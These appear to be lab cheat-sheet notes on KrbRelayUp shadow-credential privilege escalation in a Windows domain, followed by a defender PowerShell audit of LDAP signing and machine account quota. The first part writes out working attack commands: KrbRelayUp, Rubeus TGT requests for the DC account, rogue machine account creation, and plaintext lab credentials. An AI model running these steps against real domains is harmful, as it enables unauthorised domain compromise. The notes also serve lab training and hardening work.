This is essentially a universal, no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings).
```bash
# Check if LDAP signing is not enforced
cme ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M ldap-checker

# Check if we can use a shadow credential attack. Shadow credentials are abusable
# if PKINIT is supported by the DC; through cme we can verify the machine account quota
cme ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M maq

# Get CLSIDs
c980e4c2-c178-4572-935d-a8a429884806
90f18417-f0f1-484e-9d3c-59dceee5dbd8
03ca98d6-ff5d-49b8-abc6-03dd84127020
d99e6e73-fc88-11d0-b498-00a0c90312f3 (certsrv.exe)
42cbfaa7-a4a7-47bb-b422-bd10e9d02700
000c101c-0000-0000-c000-000000000046
1b48339c-d15e-45f3-ad55-a851cb66be6b
49e6370b-ab71-40ab-92f4-b009593e4518
50d185b9-fff3-4656-92c7-e4018da4361d
3c6859ce-230b-48a4-be6c-932c0c202048 (trusted installer service)
# https://vulndev.io/cheats-windows/
```
Attack with Shadow Account
Purpose: Create a shadow account for an existing machine account and abuse it to get a TGT for Administrator
```powershell
# KrbRelayUp attack for shadow account with certificate
.\KrbRelayUp.exe full -m shadowcred -f -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246

# Get TGT
# Rubeus.exe asktgt /user:<DC name> /certificate:<base64 of certificate> /password:<certificate password> /enctype:<PKINIT etype> /nowrap
PS> .\Rubeus.exe asktgt /user:brunodc$ /certificate:MIIKSA...<snip> /password:xP9-kA9#oX0# /enctype:AES256 /nowrap
# Ensure that the ticket is issued to the machine account.
```

```bash
# Convert the ticket
# copy and paste the base64 ticket into a bruno_ticket file
cat ./bruno_ticket | base64 -d > bruno_ticket.kirbi
ticketConverter.py bruno_ticket.kirbi bruno_ticket.ccache
```

```powershell
# Create a new machine account
./Sharpmad.exe MAQ -Action new -MachineAccount evil -MachinePassword Pass.123

# Get the SID of the new account
PS> $o = ([ADSI]"LDAP://CN=evil,CN=Computers,DC=bruno,DC=vl").objectSID
PS> (New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value
```
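As an added defender-side audit (not part of the original notes or of the KrbRelayUp project), the following PowerShell checks the two preconditions the cheat sheet probes with `ldap-checker` and `maq`: whether each DC requires LDAP signing and channel binding, and whether the domain's `ms-DS-MachineAccountQuota` still allows ordinary users to add machine accounts. It assumes the ActiveDirectory RSAT module and PowerShell remoting to the DCs.

```powershell
# Added audit script: reports the weak settings KrbRelayUp depends on.
# Assumes RSAT ActiveDirectory module and WinRM access to every DC.
Import-Module ActiveDirectory

$domain   = Get-ADDomain
$findings = @()

# 1. ms-DS-MachineAccountQuota: the default of 10 lets any authenticated user
#    create computer objects. Hardened value is 0:
#    Set-ADDomain -Identity $domain -Replace @{'ms-DS-MachineAccountQuota'='0'}
$maq = (Get-ADObject -Identity $domain.DistinguishedName `
            -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
if ($maq -gt 0) {
    $findings += "Domain: ms-DS-MachineAccountQuota=$maq (hardened value: 0)"
}

# 2. LDAP signing / channel binding on each DC. LDAPServerIntegrity 0 or 1 means
#    signing is only negotiated (the default), 2 means it is required.
#    LdapEnforceChannelBinding 2 is "always" for LDAPS.
$ntdsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
foreach ($dc in Get-ADDomainController -Filter *) {
    $vals = Invoke-Command -ComputerName $dc.HostName -ArgumentList $ntdsKey -ScriptBlock {
        param($path)
        $p = Get-ItemProperty -Path $path
        [pscustomobject]@{
            Signing        = $p.LDAPServerIntegrity        # $null if the value is absent
            ChannelBinding = $p.LdapEnforceChannelBinding  # $null if the value is absent
        }
    }
    if ($vals.Signing -ne 2) {
        $findings += "$($dc.HostName): LDAPServerIntegrity=$($vals.Signing) (required: 2)"
    }
    if ($vals.ChannelBinding -ne 2) {
        $findings += "$($dc.HostName): LdapEnforceChannelBinding=$($vals.ChannelBinding) (required: 2)"
    }
}

if ($findings.Count -eq 0) { 'No weak settings found' } else { $findings }
```

Writes to `msDS-KeyCredentialLink` on computer objects can additionally be audited through Directory Service Changes events (ID 5136) once a SACL for that attribute is in place.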